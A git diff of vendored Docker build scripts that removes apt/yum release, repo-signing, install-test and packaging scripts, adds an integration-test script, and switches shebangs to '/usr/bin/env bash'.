-if [[ "$VERSION" == *-dev ]] || [ -n "$(git status --porcelain)" ]; then
-	component="experimental"
-fi
-
-# Make sure our component is in the list of components
-if [[ ! "${components[*]}" =~ $component ]] ; then
-	components+=( $component )
-fi
-
-# create apt-ftparchive file on every run. This is essential to avoid
-# using stale versions of the config file that could cause unnecessary
-# refreshing of bits for EOL-ed releases.
-cat <<-EOF > "$APTDIR/conf/apt-ftparchive.conf"
-Dir {
-	ArchiveDir "${APTDIR}";
-	CacheDir "${APTDIR}/db";
-};
-
-Default {
-	Packages::Compress ". gzip bzip2";
-	Sources::Compress ". gzip bzip2";
-	Contents::Compress ". gzip bzip2";
-};
-
-TreeDefault {
-	BinCacheDB "packages-\$(SECTION)-\$(ARCH).db";
-	Directory "pool/\$(SECTION)";
-	Packages "\$(DIST)/\$(SECTION)/binary-\$(ARCH)/Packages";
-	SrcDirectory "pool/\$(SECTION)";
-	Sources "\$(DIST)/\$(SECTION)/source/Sources";
-	Contents "\$(DIST)/\$(SECTION)/Contents-\$(ARCH)";
-	FileList "$APTDIR/\$(DIST)/\$(SECTION)/filelist";
-};
-EOF
-
-for dir in bundles/$VERSION/build-deb/*/; do
-	version="$(basename "$dir")"
-	suite="${version//debootstrap-}"
-
-	cat <<-EOF
-	Tree "dists/${suite}" {
-		Sections "${components[*]}";
-		Architectures "${arches[*]}";
-	}
-
-	EOF
-done >> "$APTDIR/conf/apt-ftparchive.conf"
-
-cat <<-EOF > "$APTDIR/conf/docker-engine-release.conf"
-APT::FTPArchive::Release::Origin "Docker";
-APT::FTPArchive::Release::Components "${components[*]}";
-APT::FTPArchive::Release::Label "Docker APT Repository";
-APT::FTPArchive::Release::Architectures "${arches[*]}";
-EOF
-
-# release the debs
-for dir in bundles/$VERSION/build-deb/*/; do
-	version="$(basename "$dir")"
-	codename="${version//debootstrap-}"
-
-	tempdir="$(mktemp -d /tmp/tmp-docker-release-deb.XXXXXXXX)"
-	DEBFILE=( "$dir/docker-engine"*.deb )
-
-	# add the deb for each component for the distro version into the
-	# pool (if it is not there already)
-	mkdir -p "$APTDIR/pool/$component/d/docker-engine/"
- 	for deb in ${DEBFILE[@]}; do
-		d=$(basename "$deb")
-		# We do not want to generate a new deb if it has already been
-		# copied into the APTDIR
-		if [ ! -f "$APTDIR/pool/$component/d/docker-engine/$d" ]; then
-			cp "$deb" "$tempdir/"
-			# if we have a $GPG_PASSPHRASE we may as well
-			# dpkg-sign before copying the deb into the pool
-			if [ ! -z "$GPG_PASSPHRASE" ]; then
-				dpkg-sig -g "--no-tty  --digest-algo 'sha512' --passphrase '$GPG_PASSPHRASE'" \
-					-k "$GPG_KEYID" --sign builder "$tempdir/$d"
-			fi
-			mv "$tempdir/$d" "$APTDIR/pool/$component/d/docker-engine/"
-		fi
-	done
-
-	rm -rf "$tempdir"
-
-	# build the right directory structure, needed for apt-ftparchive
-	for arch in "${arches[@]}"; do
-		for c in "${components[@]}"; do
-			mkdir -p "$APTDIR/dists/$codename/$c/binary-$arch"
-		done
-	done
-
-	# update the filelist for this codename/component
-	find "$APTDIR/pool/$component" \
-		-name *~${codename}*.deb -o \
-		-name *~${codename#*-}*.deb > "$APTDIR/dists/$codename/$component/filelist"
-done
-
-# run the apt-ftparchive commands so we can have pinning
-apt-ftparchive generate "$APTDIR/conf/apt-ftparchive.conf"
-
-for dir in bundles/$VERSION/build-deb/*/; do
-	version="$(basename "$dir")"
-	codename="${version//debootstrap-}"
-
-	apt-ftparchive \
-		-c "$APTDIR/conf/docker-engine-release.conf" \
-		-o "APT::FTPArchive::Release::Codename=$codename" \
-		-o "APT::FTPArchive::Release::Suite=$codename" \
-		release \
-		"$APTDIR/dists/$codename" > "$APTDIR/dists/$codename/Release"
-
-	for arch in "${arches[@]}"; do
-		apt-ftparchive \
-			-c "$APTDIR/conf/docker-engine-release.conf" \
-			-o "APT::FTPArchive::Release::Codename=$codename" \
-			-o "APT::FTPArchive::Release::Suite=$codename" \
-			-o "APT::FTPArchive::Release::Components=$component" \
-			-o "APT::FTPArchive::Release::Architecture=$arch" \
-			release \
-			"$APTDIR/dists/$codename/$component/binary-$arch" > "$APTDIR/dists/$codename/$component/binary-$arch/Release"
-	done
-done
diff --git a/vendor/github.com/docker/docker/hack/make/release-rpm b/vendor/github.com/docker/docker/hack/make/release-rpm
deleted file mode 100755
index d7e3ec4f8a..0000000000
--- a/vendor/github.com/docker/docker/hack/make/release-rpm
+++ /dev/null
@@ -1,71 +0,0 @@
-#!/bin/bash
-set -e
-
-# This script creates the yum repos for the .rpm files generated by hack/make/build-rpm
-#
-# The following can then be used as a yum repo:
-# 	http://yum.dockerproject.org/repo/$release/$distro/$distro-version
-#
-# For example:
-# 	http://yum.dockerproject.org/repo/main/fedora/23
-# 	http://yum.dockerproject.org/repo/testing/centos/7
-# 	http://yum.dockerproject.org/repo/experimental/fedora/23
-# 	http://yum.dockerproject.org/repo/main/centos/7
-#
-# ... and so on and so forth for the builds created by hack/make/build-rpm
-
-: ${DOCKER_RELEASE_DIR:=$DEST}
-YUMDIR=$DOCKER_RELEASE_DIR/yum/repo
-: ${GPG_KEYID:=releasedocker}
-
-# get the release
-release="main"
-
-if [[ "$VERSION" == *-rc* ]]; then
-	release="testing"
-fi
-
-if [[ "$VERSION" == *-dev ]] || [ -n "$(git status --porcelain)" ]; then
-	release="experimental"
-fi
-
-# Setup the yum repo
-for dir in bundles/$VERSION/build-rpm/*/; do
-	version="$(basename "$dir")"
-	suite="${version##*-}"
-	distro="${version%-*}"
-
-	REPO=$YUMDIR/$release/$distro
-
-	# if the directory does not exist, initialize the yum repo
-	if [[ ! -d $REPO/$suite/Packages ]]; then
-		mkdir -p "$REPO/$suite/Packages"
-
-		createrepo --pretty "$REPO/$suite"
-	fi
-
-	# path to rpms
-	RPMFILE=( "bundles/$VERSION/build-rpm/$version/RPMS/"*"/docker-engine"*.rpm "bundles/$VERSION/build-rpm/$version/SRPMS/docker-engine"*.rpm )
-
-	# if we have a $GPG_PASSPHRASE we may as well
-	# sign the rpms before adding to repo
-	if [ ! -z $GPG_PASSPHRASE ]; then
-		# export our key to rpm import
-		gpg --armor --export "$GPG_KEYID" > /tmp/gpg
-		rpm --import /tmp/gpg
-
-		# sign the rpms
-		echo "yes" | setsid rpm \
-			--define "_gpg_name $GPG_KEYID" \
-			--define "_signature gpg" \
-			--define "__gpg_check_password_cmd /bin/true" \
-			--define "__gpg_sign_cmd %{__gpg} gpg --batch --no-armor --digest-algo 'sha512' --passphrase '$GPG_PASSPHRASE' --no-secmem-warning -u '%{_gpg_name}' --sign --detach-sign --output %{__signature_filename} %{__plaintext_filename}" \
-			--resign "${RPMFILE[@]}"
-	fi
-
-	# copy the rpms to the packages folder
-	cp "${RPMFILE[@]}" "$REPO/$suite/Packages"
-
-	# update the repo
-	createrepo --pretty --update "$REPO/$suite"
-done
diff --git a/vendor/github.com/docker/docker/hack/make/run b/vendor/github.com/docker/docker/hack/make/run
index 37cfd53b5f..3254280260 100644
--- a/vendor/github.com/docker/docker/hack/make/run
+++ b/vendor/github.com/docker/docker/hack/make/run
@@ -1,4 +1,4 @@
-#!/bin/bash
+#!/usr/bin/env bash
 
 set -e
 rm -rf "$DEST"
@@ -28,9 +28,9 @@ if [ -n "$DOCKER_PORT" ]; then
 	listen_port="${ports[-1]}"
 fi
 
-extra_params=""
+extra_params="$DOCKERD_ARGS"
 if [ "$DOCKER_REMAP_ROOT" ]; then
-	extra_params="--userns-remap $DOCKER_REMAP_ROOT"
+	extra_params="$extra_params --userns-remap $DOCKER_REMAP_ROOT"
 fi
 
 args="--debug \
diff --git a/vendor/github.com/docker/docker/hack/make/sign-repos b/vendor/github.com/docker/docker/hack/make/sign-repos
deleted file mode 100755
index 6ed1606885..0000000000
--- a/vendor/github.com/docker/docker/hack/make/sign-repos
+++ /dev/null
@@ -1,65 +0,0 @@
-#!/bin/bash
-
-# This script signs the deliverables from release-deb and release-rpm
-# with a designated GPG key.
-
-: ${DOCKER_RELEASE_DIR:=$DEST}
-: ${GPG_KEYID:=releasedocker}
-APTDIR=$DOCKER_RELEASE_DIR/apt/repo
-YUMDIR=$DOCKER_RELEASE_DIR/yum/repo
-
-if [ -z "$GPG_PASSPHRASE" ]; then
-	echo >&2 'you need to set GPG_PASSPHRASE in order to sign artifacts'
-	exit 1
-fi
-
-if [ ! -d $APTDIR ] && [ ! -d $YUMDIR ]; then
-	echo >&2 'release-rpm or release-deb must be run before sign-repos'
-	exit 1
-fi
-
-sign_packages(){
-	# sign apt repo metadata
-	if [ -d $APTDIR ]; then
-		# create file with public key
-		gpg --armor --export "$GPG_KEYID" > "$DOCKER_RELEASE_DIR/apt/gpg"
-
-		# sign the repo metadata
-		for F in $(find $APTDIR -name Release); do
-			if test "$F" -nt "$F.gpg" ; then
-				gpg -u "$GPG_KEYID" --passphrase "$GPG_PASSPHRASE" \
-					--digest-algo "sha512" \
-					--armor --sign --detach-sign \
-					--batch --yes \
-					--output "$F.gpg" "$F"
-			fi
-			inRelease="$(dirname "$F")/InRelease"
-			if test "$F" -nt "$inRelease" ; then
-				gpg -u "$GPG_KEYID" --passphrase "$GPG_PASSPHRASE" \
-					--digest-algo "sha512" \
-					--clearsign \
-					--batch --yes \
-					--output "$inRelease" "$F"
-			fi
-		done
-	fi
-
-	# sign yum repo metadata
-	if [ -d $YUMDIR ]; then
-		# create file with public key
-		gpg --armor --export "$GPG_KEYID" > "$DOCKER_RELEASE_DIR/yum/gpg"
-
-		# sign the repo metadata
-		for F in $(find $YUMDIR -name repomd.xml); do
-			if test "$F" -nt "$F.asc" ; then
-				gpg -u "$GPG_KEYID" --passphrase "$GPG_PASSPHRASE" \
-					--digest-algo "sha512" \
-					--armor --sign --detach-sign \
-					--batch --yes \
-					--output "$F.asc" "$F"
-			fi
-		done
-	fi
-}
-
-sign_packages
diff --git a/vendor/github.com/docker/docker/hack/make/test-deb-install b/vendor/github.com/docker/docker/hack/make/test-deb-install
deleted file mode 100755
index aec5847600..0000000000
--- a/vendor/github.com/docker/docker/hack/make/test-deb-install
+++ /dev/null
@@ -1,71 +0,0 @@
-#!/bin/bash
-# This script is used for testing install.sh and that it works for
-# each of component of our apt and yum repos
-set -e
-
-: ${DEB_DIR:="$(pwd)/bundles/$(cat VERSION)/build-deb"}
-
-if [[ ! -d "${DEB_DIR}" ]]; then
-	echo "you must first run `make deb` or hack/make/build-deb"
-	exit 1
-fi
-
-test_deb_install(){
-	# test for each Dockerfile in contrib/builder
-
-	builderDir="contrib/builder/deb/${PACKAGE_ARCH}"
-	pkgs=( $(find "${builderDir}/"*/ -type d) )
-	if [ ! -z "$DOCKER_BUILD_PKGS" ]; then
-		pkgs=()
-		for p in $DOCKER_BUILD_PKGS; do
-			pkgs+=( "$builderDir/$p" )
-		done
-	fi
-	for dir in "${pkgs[@]}"; do
-		[ -d "$dir" ] || { echo >&2 "skipping nonexistent $dir"; continue; }
-		local from="$(awk 'toupper($1) == "FROM" { print $2; exit }' "$dir/Dockerfile")"
-		local dir=$(basename "$dir")
-
-		if [[ ! -d "${DEB_DIR}/${dir}" ]]; then
-			echo "No deb found for ${dir}"
-			exit 1
-		fi
-
-		local script=$(mktemp /tmp/install-XXXXXXXXXX.sh)
-		cat <<-EOF > "${script}"
-		#!/bin/bash
-		set -e
-		set -x
-
-		apt-get update && apt-get install -y apparmor
-
-		dpkg -i /root/debs/*.deb || true
-
-		apt-get install -yf
-
-		/etc/init.d/apparmor start
-
-		# this will do everything _except_ load the profile into the kernel
-		(
-		cd /etc/apparmor.d
-		/sbin/apparmor_parser --skip-kernel-load docker-engine
-		)
-		EOF
-
-		chmod +x "${script}"
-
-		echo "testing deb install for ${from}"
-		docker run --rm -i --privileged \
-			-v ${DEB_DIR}/${dir}:/root/debs \
-			-v ${script}:/install.sh \
-			${from} /install.sh
-
-		rm -f ${script}
-	done
-}
-
-(
-	bundle .integration-daemon-start
-	test_deb_install
-	bundle .integration-daemon-stop
-) 2>&1 | tee -a "$DEST/test.log"
diff --git a/vendor/github.com/docker/docker/hack/make/test-docker-py b/vendor/github.com/docker/docker/hack/make/test-docker-py
index fcacc16436..b30879e3a0 100644
--- a/vendor/github.com/docker/docker/hack/make/test-docker-py
+++ b/vendor/github.com/docker/docker/hack/make/test-docker-py
@@ -1,4 +1,4 @@
-#!/bin/bash
+#!/usr/bin/env bash
 set -e
 
 source hack/make/.integration-test-helpers
diff --git a/vendor/github.com/docker/docker/hack/make/test-install-script b/vendor/github.com/docker/docker/hack/make/test-install-script
deleted file mode 100755
index 4782cbea88..0000000000
--- a/vendor/github.com/docker/docker/hack/make/test-install-script
+++ /dev/null
@@ -1,31 +0,0 @@
-#!/bin/bash
-# This script is used for testing install.sh and that it works for
-# each of component of our apt and yum repos
-set -e
-
-test_install_script(){
-	# these are equivalent to main, testing, experimental components
-	# in the repos, but its the url that will do the conversion
-	components=( experimental test get )
-
-	for component in "${components[@]}"; do
-		# change url to specific component for testing
-		local test_url=https://${component}.docker.com
-		local script=$(mktemp /tmp/install-XXXXXXXXXX.sh)
-		sed "s,url='https://get.docker.com/',url='${test_url}/'," hack/install.sh > "${script}"
-
-		chmod +x "${script}"
-
-		# test for each Dockerfile in contrib/builder
-		for dir in contrib/builder/*/*/; do
-			local from="$(awk 'toupper($1) == "FROM" { print $2; exit }' "$dir/Dockerfile")"
-
-			echo "running install.sh for ${component} with ${from}"
-			docker run --rm -i -v ${script}:/install.sh ${from} /install.sh
-		done
-
-		rm -f ${script}
-	done
-}
-
-test_install_script
diff --git a/vendor/github.com/docker/docker/hack/make/test-integration b/vendor/github.com/docker/docker/hack/make/test-integration
new file mode 100755
index 0000000000..c807cd4978
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/make/test-integration
@@ -0,0 +1,21 @@
+#!/usr/bin/env bash
+set -e -o pipefail
+
+source hack/make/.integration-test-helpers
+
+(
+	build_test_suite_binaries
+	bundle .integration-daemon-start
+	bundle .integration-daemon-setup
+
+	local testexit=0
+	( repeat run_test_integration ) || testexit=$?
+
+	# Always run cleanup, even if the subshell fails
+	bundle .integration-daemon-stop
+	cleanup_test_suite_binaries
+	error_on_leaked_containerd_shims
+
+	exit $testexit
+
+) 2>&1 | tee -a "$DEST/test.log"
diff --git a/vendor/github.com/docker/docker/hack/make/test-integration-cli b/vendor/github.com/docker/docker/hack/make/test-integration-cli
index 689a5285f3..480851e70f 100755
--- a/vendor/github.com/docker/docker/hack/make/test-integration-cli
+++ b/vendor/github.com/docker/docker/hack/make/test-integration-cli
@@ -1,28 +1,6 @@
-#!/bin/bash
+#!/usr/bin/env bash
 set -e
+echo "WARNING: test-integration-cli is DEPRECATED. Use test-integration." >&2
 
-source hack/make/.integration-test-helpers
-
-# subshell so that we can export PATH without breaking other things
-(
-	bundle .integration-daemon-start
-
-	bundle .integration-daemon-setup
-
-	bundle_test_integration_cli
-
-	bundle .integration-daemon-stop
-
-	if [ "$(go env GOOS)" != 'windows' ]
-	then
-		leftovers=$(ps -ax -o pid,cmd | awk '$2 == "docker-containerd-shim" && $4 ~ /.*\/bundles\/.*\/test-integration-cli/ { print $1 }')
-		if [ -n "$leftovers" ]
-		then
-			ps aux
-			kill -9 $leftovers 2> /dev/null
-			echo "!!!! WARNING you have left over shim(s), Cleanup your test !!!!"
-			exit 1
-		fi
-	fi
-
-) 2>&1 | tee -a "$DEST/test.log"
+# TODO: remove this and exit 1 once CI has changed to use test-integration
+bundle test-integration
diff --git a/vendor/github.com/docker/docker/hack/make/test-integration-shell b/vendor/github.com/docker/docker/hack/make/test-integration-shell
index 86df9654a3..bcfa4682eb 100644
--- a/vendor/github.com/docker/docker/hack/make/test-integration-shell
+++ b/vendor/github.com/docker/docker/hack/make/test-integration-shell
@@ -1,7 +1,9 @@
-#!/bin/bash
+#!/usr/bin/env bash
 
 bundle .integration-daemon-start
 bundle .integration-daemon-setup
 
 export ABS_DEST
 bash +e
+
+bundle .integration-daemon-stop
diff --git a/vendor/github.com/docker/docker/hack/make/test-old-apt-repo b/vendor/github.com/docker/docker/hack/make/test-old-apt-repo
deleted file mode 100755
index bb20128e30..0000000000
--- a/vendor/github.com/docker/docker/hack/make/test-old-apt-repo
+++ /dev/null
@@ -1,29 +0,0 @@
-#!/bin/bash
-set -e
-
-versions=( 1.3.3 1.4.1 1.5.0 1.6.2 )
-
-install() {
-	local version=$1
-	local tmpdir=$(mktemp -d /tmp/XXXXXXXXXX)
-	local dockerfile="${tmpdir}/Dockerfile"
-	cat <<-EOF > "$dockerfile"
-	FROM debian:jessie
-	ENV VERSION ${version}
-	RUN apt-get update && apt-get install -y \
-		apt-transport-https \
-		ca-certificates \
-		--no-install-recommends
-	RUN echo "deb https://get.docker.com/ubuntu docker main" > /etc/apt/sources.list.d/docker.list
-	RUN apt-key adv --keyserver hkp://keyserver.ubuntu.com:80 \
-		--recv-keys 36A1D7869245C8950F966E92D8576A8BA88D21E9
-	RUN apt-get update && apt-get install -y \
-		lxc-docker-\${VERSION}
-	EOF
-
-	docker build --rm --force-rm --no-cache -t docker-old-repo:${version} -f $dockerfile $tmpdir
-}
-
-for v in "${versions[@]}"; do
-	install "$v"
-done
diff --git a/vendor/github.com/docker/docker/hack/make/test-unit b/vendor/github.com/docker/docker/hack/make/test-unit
deleted file mode 100644
index f263345ce6..0000000000
--- a/vendor/github.com/docker/docker/hack/make/test-unit
+++ /dev/null
@@ -1,55 +0,0 @@
-#!/bin/bash
-set -e
-
-# Run Docker's test suite, including sub-packages, and store their output as a bundle
-# If $TESTFLAGS is set in the environment, it is passed as extra arguments to 'go test'.
-# You can use this to select certain tests to run, e.g.
-#
-#   TESTFLAGS='-test.run ^TestBuild$' ./hack/make.sh test-unit
-#
-bundle_test_unit() {
-	TESTFLAGS+=" -test.timeout=${TIMEOUT}"
-	INCBUILD="-i"
-	count=0
-	for flag in "${BUILDFLAGS[@]}"; do
-		if [ "${flag}" == ${INCBUILD} ]; then
-			unset BUILDFLAGS[${count}]
-			break
-		fi
-		count=$[ ${count} + 1 ]
-	done
-
-	date
-	if [ -z "$TESTDIRS" ]; then
-		TEST_PATH=./...
-	else
-		TEST_PATH=./${TESTDIRS}
-	fi
-
-	if [ "$(go env GOHOSTOS)" = 'solaris' ]; then
-		pkg_list=$(go list -e \
-			-f '{{if ne .Name "github.com/docker/docker"}}
-				{{.ImportPath}}
-			    {{end}}' \
-			"${BUILDFLAGS[@]}" $TEST_PATH \
-			| grep github.com/docker/docker \
-			| grep -v github.com/docker/docker/vendor \
-			| grep -v github.com/docker/docker/daemon/graphdriver \
-			| grep -v github.com/docker/docker/man \
-			| grep -v github.com/docker/docker/integration-cli)
-	else
-		pkg_list=$(go list -e \
-			-f '{{if ne .Name "github.com/docker/docker"}}
-				{{.ImportPath}}
-			    {{end}}' \
-			"${BUILDFLAGS[@]}" $TEST_PATH \
-			| grep github.com/docker/docker \
-			| grep -v github.com/docker/docker/vendor \
-			| grep -v github.com/docker/docker/man \
-			| grep -v github.com/docker/docker/integration-cli)
-	fi
-
-	go test -cover -ldflags "$LDFLAGS" "${BUILDFLAGS[@]}" $TESTFLAGS $pkg_list
-}
-
-bundle_test_unit 2>&1 | tee -a "$DEST/test.log"
diff --git a/vendor/github.com/docker/docker/hack/make/tgz b/vendor/github.com/docker/docker/hack/make/tgz
deleted file mode 100644
index 3ccd93fa01..0000000000
--- a/vendor/github.com/docker/docker/hack/make/tgz
+++ /dev/null
@@ -1,92 +0,0 @@
-#!/bin/bash
-
-CROSS="$DEST/../cross"
-
-set -e
-
-arch=$(go env GOHOSTARCH)
-if [ ! -d "$CROSS/linux/${arch}" ]; then
-	echo >&2 'error: binary and cross must be run before tgz'
-	false
-fi
-
-(
-for d in "$CROSS/"*/*; do
-	export GOARCH="$(basename "$d")"
-	export GOOS="$(basename "$(dirname "$d")")"
-
-	source "${MAKEDIR}/.binary-setup"
-
-	BINARY_NAME="${DOCKER_CLIENT_BINARY_NAME}-$VERSION"
-	DAEMON_BINARY_NAME="${DOCKER_DAEMON_BINARY_NAME}-$VERSION"
-	PROXY_BINARY_NAME="${DOCKER_PROXY_BINARY_NAME}-$VERSION"
-	BINARY_EXTENSION="$(export GOOS && binary_extension)"
-	if [ "$GOOS" = 'windows' ]; then
-		# if windows use a zip, not tgz
-		BUNDLE_EXTENSION=".zip"
-		IS_TAR="false"
-	elif [ "$GOOS" == "solaris" ]; then
-		# Solaris bypasses cross due to CGO issues.
-		continue
-	else
-		BUNDLE_EXTENSION=".tgz"
-		IS_TAR="true"
-	fi
-	BINARY_FULLNAME="$BINARY_NAME$BINARY_EXTENSION"
-	DAEMON_BINARY_FULLNAME="$DAEMON_BINARY_NAME$BINARY_EXTENSION"
-	PROXY_BINARY_FULLNAME="$PROXY_BINARY_NAME$BINARY_EXTENSION"
-	mkdir -p "$DEST/$GOOS/$GOARCH"
-	TGZ="$DEST/$GOOS/$GOARCH/$BINARY_NAME$BUNDLE_EXTENSION"
-
-	# The staging directory for the files in the tgz
-	BUILD_PATH="$DEST/build"
-
-	# The directory that is at the root of the tar file
-	TAR_BASE_DIRECTORY="docker"
-
-	# $DEST/build/docker
-	TAR_PATH="$BUILD_PATH/$TAR_BASE_DIRECTORY"
-
-	# Copy the correct docker binary
-	mkdir -p $TAR_PATH
-	cp -L "$d/$BINARY_FULLNAME" "$TAR_PATH/${DOCKER_CLIENT_BINARY_NAME}${BINARY_EXTENSION}"
-	if [ -f "$d/$DAEMON_BINARY_FULLNAME" ]; then
-		cp -L "$d/$DAEMON_BINARY_FULLNAME" "$TAR_PATH/${DOCKER_DAEMON_BINARY_NAME}${BINARY_EXTENSION}"
-	fi
-	if [ -f "$d/$PROXY_BINARY_FULLNAME" ]; then
-		cp -L "$d/$PROXY_BINARY_FULLNAME" "$TAR_PATH/${DOCKER_PROXY_BINARY_NAME}${BINARY_EXTENSION}"
-	fi
-
-	# copy over all the extra binaries
-	copy_binaries $TAR_PATH
-
-	# add completions
-	for s in bash fish zsh; do
-		mkdir -p $TAR_PATH/completion/$s
-		cp -L contrib/completion/$s/*docker* $TAR_PATH/completion/$s/
-	done
-
-	if [ "$IS_TAR" == "true" ]; then
-		echo "Creating tgz from $BUILD_PATH and naming it $TGZ"
-		tar --numeric-owner --owner 0 -C "$BUILD_PATH" -czf "$TGZ" $TAR_BASE_DIRECTORY
-	else
-		# ZIP needs to full absolute dir path, not the absolute path
-		ZIP=`pwd`"/$TGZ"
-		# keep track of where we are, for later.
-		pushd .
-		# go into the BUILD_PATH since zip does not have a -C equivalent.
-		cd $BUILD_PATH
-		echo "Creating zip from $BUILD_PATH and naming it $ZIP"
-		zip -q -r $ZIP $TAR_BASE_DIRECTORY
-		# go back to where we started
-		popd
-	fi
-
-	hash_files "$TGZ"
-
-	# cleanup after ourselves
-	rm -rf "$BUILD_PATH"
-
-	echo "Created tgz: $TGZ"
-done
-)
diff --git a/vendor/github.com/docker/docker/hack/make/ubuntu b/vendor/github.com/docker/docker/hack/make/ubuntu
deleted file mode 100644
index 8de5d9ceac..0000000000
--- a/vendor/github.com/docker/docker/hack/make/ubuntu
+++ /dev/null
@@ -1,190 +0,0 @@
-#!/bin/bash
-
-PKGVERSION="${VERSION//-/'~'}"
-# if we have a "-dev" suffix or have change in Git, let's make this package version more complex so it works better
-if [[ "$VERSION" == *-dev ]] || [ -n "$(git status --porcelain)" ]; then
-	GIT_UNIX="$(git log -1 --pretty='%at')"
-	GIT_DATE="$(date --date "@$GIT_UNIX" +'%Y%m%d.%H%M%S')"
-	GIT_COMMIT="$(git log -1 --pretty='%h')"
-	GIT_VERSION="git${GIT_DATE}.0.${GIT_COMMIT}"
-	# GIT_VERSION is now something like 'git20150128.112847.0.17e840a'
-	PKGVERSION="$PKGVERSION~$GIT_VERSION"
-fi
-
-# $ dpkg --compare-versions 1.5.0 gt 1.5.0~rc1 && echo true || echo false
-# true
-# $ dpkg --compare-versions 1.5.0~rc1 gt 1.5.0~git20150128.112847.17e840a && echo true || echo false
-# true
-# $ dpkg --compare-versions 1.5.0~git20150128.112847.17e840a gt 1.5.0~dev~git20150128.112847.17e840a && echo true || echo false
-# true
-
-# ie, 1.5.0 > 1.5.0~rc1 > 1.5.0~git20150128.112847.17e840a > 1.5.0~dev~git20150128.112847.17e840a
-
-PACKAGE_ARCHITECTURE="$(dpkg-architecture -qDEB_HOST_ARCH)"
-PACKAGE_URL="https://www.docker.com/"
-PACKAGE_MAINTAINER="support@docker.com"
-PACKAGE_DESCRIPTION="Linux container runtime
-Docker complements LXC with a high-level API which operates at the process
-level. It runs unix processes with strong guarantees of isolation and
-repeatability across servers.
-Docker is a great building block for automating distributed systems:
-large-scale web deployments, database clusters, continuous deployment systems,
-private PaaS, service-oriented architectures, etc."
-PACKAGE_LICENSE="Apache-2.0"
-
-# Build docker as an ubuntu package using FPM and REPREPRO (sue me).
-# bundle_binary must be called first.
-bundle_ubuntu() {
-	DIR="$ABS_DEST/build"
-
-	# Include our udev rules
-	mkdir -p "$DIR/etc/udev/rules.d"
-	cp contrib/udev/80-docker.rules "$DIR/etc/udev/rules.d/"
-
-	# Include our init scripts
-	mkdir -p "$DIR/etc/init"
-	cp contrib/init/upstart/docker.conf "$DIR/etc/init/"
-	mkdir -p "$DIR/etc/init.d"
-	cp contrib/init/sysvinit-debian/docker "$DIR/etc/init.d/"
-	mkdir -p "$DIR/etc/default"
-	cp contrib/init/sysvinit-debian/docker.default "$DIR/etc/default/docker"
-	mkdir -p "$DIR/lib/systemd/system"
-	cp contrib/init/systemd/docker.{service,socket} "$DIR/lib/systemd/system/"
-
-	# Include contributed completions
-	mkdir -p "$DIR/etc/bash_completion.d"
-	cp contrib/completion/bash/docker "$DIR/etc/bash_completion.d/"
-	mkdir -p "$DIR/usr/share/zsh/vendor-completions"
-	cp contrib/completion/zsh/_docker "$DIR/usr/share/zsh/vendor-completions/"
-	mkdir -p "$DIR/etc/fish/completions"
-	cp contrib/completion/fish/docker.fish "$DIR/etc/fish/completions/"
-
-	# Include man pages
-	make manpages
-	manRoot="$DIR/usr/share/man"
-	mkdir -p "$manRoot"
-	for manDir in man/man?; do
-		manBase="$(basename "$manDir")" # "man1"
-		for manFile in "$manDir"/*; do
-			manName="$(basename "$manFile")" # "docker-build.1"
-			mkdir -p "$manRoot/$manBase"
-			gzip -c "$manFile" > "$manRoot/$manBase/$manName.gz"
-		done
-	done
-
-	# Copy the binary
-	# This will fail if the binary bundle hasn't been built
-	mkdir -p "$DIR/usr/bin"
-	cp "$DEST/../binary/docker-$VERSION" "$DIR/usr/bin/docker"
-
-	# Generate postinst/prerm/postrm scripts
-	cat > "$DEST/postinst" <<'EOF'
-#!/bin/sh
-set -e
-set -u
-
-if [ "$1" = 'configure' ] && [ -z "$2" ]; then
-	if ! getent group docker > /dev/null; then
-		groupadd --system docker
-	fi
-fi
-
-if ! { [ -x /sbin/initctl ] && /sbin/initctl version 2>/dev/null | grep -q upstart; }; then
-	# we only need to do this if upstart isn't in charge
-	update-rc.d docker defaults > /dev/null || true
-fi
-if [ -n "$2" ]; then
-	_dh_action=restart
-else
-	_dh_action=start
-fi
-service docker $_dh_action 2>/dev/null || true
-
-#DEBHELPER#
-EOF
-	cat > "$DEST/prerm" <<'EOF'
-#!/bin/sh
-set -e
-set -u
-
-service docker stop 2>/dev/null || true
-
-#DEBHELPER#
-EOF
-	cat > "$DEST/postrm" <<'EOF'
-#!/bin/sh
-set -e
-set -u
-
-if [ "$1" = "purge" ] ; then
-	update-rc.d docker remove > /dev/null || true
-fi
-
-# In case this system is running systemd, we make systemd reload the unit files
-# to pick up changes.
-if [ -d /run/systemd/system ] ; then
-	systemctl --system daemon-reload > /dev/null || true
-fi
-
-#DEBHELPER#
-EOF
-	# TODO swaths of these were borrowed from debhelper's auto-inserted stuff, because we're still using fpm - we need to use debhelper instead, and somehow reconcile Ubuntu that way
-	chmod +x "$DEST/postinst" "$DEST/prerm" "$DEST/postrm"
-
-	(
-		# switch directories so we create *.deb in the right folder
-		cd "$DEST"
-
-		# create lxc-docker-VERSION package
-		fpm -s dir -C "$DIR" \
-			--name "lxc-docker-$VERSION" --version "$PKGVERSION" \
-			--after-install "$ABS_DEST/postinst" \
-			--before-remove "$ABS_DEST/prerm" \
-			--after-remove "$ABS_DEST/postrm" \
-			--architecture "$PACKAGE_ARCHITECTURE" \
-			--prefix / \
-			--depends iptables \
-			--deb-recommends aufs-tools \
-			--deb-recommends ca-certificates \
-			--deb-recommends git \
-			--deb-recommends xz-utils \
-			--deb-recommends 'cgroupfs-mount | cgroup-lite' \
-			--deb-suggests apparmor \
-			--description "$PACKAGE_DESCRIPTION" \
-			--maintainer "$PACKAGE_MAINTAINER" \
-			--conflicts docker \
-			--conflicts docker.io \
-			--conflicts lxc-docker-virtual-package \
-			--provides lxc-docker \
-			--provides lxc-docker-virtual-package \
-			--replaces lxc-docker \
-			--replaces lxc-docker-virtual-package \
-			--url "$PACKAGE_URL" \
-			--license "$PACKAGE_LICENSE" \
-			--config-files /etc/udev/rules.d/80-docker.rules \
-			--config-files /etc/init/docker.conf \
-			--config-files /etc/init.d/docker \
-			--config-files /etc/default/docker \
-			--deb-compression gz \
-			-t deb .
-		# TODO replace "Suggests: cgroup-lite" with "Recommends: cgroupfs-mount | cgroup-lite" once cgroupfs-mount is available
-
-		# create empty lxc-docker wrapper package
-		fpm -s empty \
-			--name lxc-docker --version "$PKGVERSION" \
-			--architecture "$PACKAGE_ARCHITECTURE" \
-			--depends lxc-docker-$VERSION \
-			--description "$PACKAGE_DESCRIPTION" \
-			--maintainer "$PACKAGE_MAINTAINER" \
-			--url "$PACKAGE_URL" \
-			--license "$PACKAGE_LICENSE" \
-			--deb-compression gz \
-			-t deb
